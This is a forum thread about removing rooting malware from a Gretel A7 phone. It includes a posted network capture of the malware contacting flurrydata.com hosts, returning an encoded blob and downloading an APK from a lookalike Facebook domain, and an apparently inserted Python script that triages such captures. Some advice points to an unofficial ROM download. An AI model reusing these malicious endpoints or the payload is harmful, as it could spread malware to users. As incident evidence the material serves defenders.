Help removing android malware that rooted my phone


e2048

New member
Nov 6, 2018
2
0
My phone is a Gretel A7.
I got infected with malware through a dodgy website.
After rebooting, the phone got stuck on the startup logo for about 45 minutes, and when it finally started I started getting popups.
I believe the malware rooted my phone.
The malware installs additional apps that actually cause the popups. I can uninstall the apps, but I can't remove the "system" app that keeps reinstalling them.

I have had success in preventing the malware downloading and installing things by using the app NoRoot Firewall to deny network access to the infected system app.
I can also view its communication with packet sniffer app.
All attempts to disable or uninstall the infected system app have failed because I don't have root.

I have tried a few antivirus apps from the play store but none of them can detect it.
I believe the infected system app is called CopyCustomFiles, as it's the only thing running in the developer mode process list.

I don't have the ability to connect the phone to a computer to run adb, and I'm afraid to use KingRoot in case it bricks the phone.
Is there a way to get a temp root, so that if something goes wrong I can just restart?

Will a system reset get rid of it? I am afraid to do it in case it breaks something.
If it rooted and flashed something, then it will still be there after a reset, right?

Screenshot from NoRoot Firewall showing the attempted connection.
Several apps are shown; I'm not sure which one is actually infected.
https://ibb.co/jAoJfA

Here is what it does when my phone boots: it downloads and installs an APK with malware.

POST /boot HTTP/1.1
Content-Type: application/octet-stream
Connection: close
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: statistics.flurrydata.com:10000
Accept-Encoding: gzip
Content-Length: 592


HTTP/1.1 200 OK
Server: openresty/1.11.2.5
Date: Mon, 05 Nov 2018 08:20:55 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close

M0shABY5XA4XUCR6ACMdDjofIwMnLF0GRx59Ylh5XVt4RWAGFitQG0MLMwcFIgcMalNzW0xvBRQZSDoqGy4GDy1LeF8F

POST /v15_worker HTTP/1.1
Content-Type: application/octet-stream
Connection: close
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: analyze.flurrydata.com:10000
Accept-Encoding: gzip
Content-Length: 1956


HTTP/1.1 200 OK
Server: openresty/1.7.10.2
Date: Mon, 05 Nov 2018 08:21:14 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close


GET /001_20181101_67_01_20181101_1.apk HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: flare.facebook-3rd.com
Connection: Keep-Alive
Accept-Encoding: gzip
 

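A small triage script, added here as an example (not code from the thread or from any tool mentioned in it), that reads a plain-text capture like the one posted above and flags the traits a defender would look at first: a non-standard port, an APK pulled over plain HTTP, and a host that carries a well-known brand name under an unrelated registrable domain. The BRANDS table and the sample CAPTURE are constructed from the quoted headers; the brand-to-domain mapping is an assumption you would extend for your own environment.

```python
import re
# Constructed sample: request lines and Host headers copied from the capture
# quoted in the post above (response blocks and POST bodies omitted).
CAPTURE = """POST /boot HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: statistics.flurrydata.com:10000

POST /v15_worker HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: analyze.flurrydata.com:10000

GET /001_20181101_67_01_20181101_1.apk HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; A7 Build/MRA58K)
Host: flare.facebook-3rd.com
"""
# Assumed brand -> legitimate registrable domain table for the lookalike check.
BRANDS = {"facebook": "facebook.com", "flurry": "flurry.com"}
REQ_LINE = re.compile(r"^(GET|POST|PUT|HEAD)\s+(\S+)\s+HTTP/1\.[01]$")

def parse_requests(text):  # one record per blank-line-separated request block
    reqs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        m = REQ_LINE.match(lines[0])
        if not m:
            continue  # response blocks (HTTP/1.1 200 ...) and bodies are skipped
        hdrs = {}
        for line in lines[1:]:
            k, _, v = line.partition(":")
            hdrs[k.strip().lower()] = v.strip()
        host, _, port = hdrs.get("host", "").partition(":")
        reqs.append({"method": m.group(1), "path": m.group(2), "host": host,
                     "port": int(port) if port else 80, "headers": hdrs})
    return reqs

def flag_request(r):  # reasons this request deserves a closer look
    reasons = []
    if r["port"] not in (80, 443):
        reasons.append("non-standard port %d" % r["port"])
    if r["path"].lower().endswith(".apk"):
        reasons.append("APK fetched over plain HTTP outside an app store")
    for brand, legit in BRANDS.items():
        if brand in r["host"] and r["host"] != legit and not r["host"].endswith("." + legit):
            reasons.append("host uses brand '%s' outside %s" % (brand, legit))
    return reasons

def triage(text):  # host+path -> reasons, flagged requests only
    return {r["host"] + r["path"]: flag_request(r)
            for r in parse_requests(text) if flag_request(r)}
```

Run `triage(CAPTURE)` to get a dict keyed by host and path; every request in the posted capture comes back with at least one reason, which is why NoRoot Firewall blocking that app's network access stopped the reinstalls.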
IronRoo

Senior Member
Aug 4, 2014
1,342
434
I don't have the ability to connect the phone to a computer to run adb, and I'm afraid to use KingRoot in case it bricks the phone.
Is there a way to get a temp root, so that if something goes wrong I can just restart?

Will a system reset get rid of it? I am afraid to do it in case it breaks something.
If it rooted and flashed something, then it will still be there after a reset, right?

No, a system reset will not get rid of it, as these malicious apps are installed as system apps, so they will not be affected by a reset.

If you flash the latest stock ROM from your manufacturer (not from some random download site, as this may be malicious also, unless you can check its digital signature against the official signature), the malicious app will be overwritten and removed (as a stock ROM writes to all partitions; but note a custom ROM normally only changes part of system, so a malicious app could survive).

There are some apps that you can use to flash new stock ROM but they all need root (I think), so not

You should be able to "freeze" the apps you mention which will stop them working, even though you can't uninstall them (there are a few threads on how to do that in this forum). But really you need to get access to a PC for either ADB or to reflash stock.
 

e2048

New member
Nov 6, 2018
2
0
After doing further research I discovered that the stock firmware for this phone is infected with malware from the factory.
There is an update that is not infected but I am not clear how to install it safely.
I can't find any official source for the stock ROM or install guide.
The only guide I found is unofficial and requires a PC and installing TWRP or SP flash.
The guide is here getdroidtips.com/stock-rom-gretel-a7/

My question is... The stock recovery menu on my phone has an option to install update from sdcard.
So can I skip the TWRP/SP flash step and just install the zip file from the above link using the recovery menu I already have?

I assume this update will overwrite/replace the OS and all system apps with the ones contained in the update, while leaving all my play store apps and settings/files intact?

Thanks.
 

skeptre

Member
Apr 18, 2011
24
2
A little late, but were you able to resolve the issue on your device? I am researching the presence of pre-installed malware on the Gretel A7 and would like to know more about your experience.
Feel free to contact me directly or please respond here.

After doing further research I discovered that the stock firmware for this phone is infected with malware from the factory.
There is an update that is not infected but I am not clear how to install it safely.
I can't find any official source for the stock ROM or install guide.
The only guide I found is unofficial and requires a PC and installing TWRP or SP flash.
The guide is here getdroidtips.com/stock-rom-gretel-a7/

My question is... The stock recovery menu on my phone has an option to install update from sdcard.
So can I skip the TWRP/SP flash step and just install the zip file from the above link using the recovery menu I already have?

I assume this update will overwrite/replace the OS and all system apps with the ones contained in the update, while leaving all my play store apps and settings/files intact?

Thanks.